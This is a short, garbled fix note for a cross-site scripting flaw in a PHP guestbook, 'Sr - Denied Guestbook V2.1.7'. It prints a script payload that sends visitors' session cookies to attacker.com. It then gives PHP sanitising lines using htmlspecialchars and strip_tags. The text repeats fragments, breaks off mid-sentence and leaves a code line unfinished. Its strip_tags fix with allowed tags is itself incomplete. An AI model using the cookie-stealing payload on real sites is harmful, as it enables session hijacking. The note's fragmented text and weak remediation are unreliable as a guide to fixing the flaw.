Fix — Sr - Denied Guestbook V2.1.7

Additionally, an authenticated admin clicking a crafted link like:

<script>document.location='http://attacker.com/steal?cookie='+document.cookie</script> When any user (including admin) viewed the guestbook, their session cookies would be sent to the attacker. Sr - Denied Guestbook V2.1.7 Fix

$name = htmlspecialchars($_POST['name'], ENT_QUOTES, 'UTF-8'); $message = strip_tags($_POST['message'], '<b><i>'); // Allow basic formatting only echo "<p>" . htmlspecialchars($name) . "</p>"; File: admin/delete_entry.php Additionally, an authenticated admin clicking a crafted link

After applying Sr-Denied Guestbook V2.1.7, the following tests were performed: $message = strip_tags($_POST['message']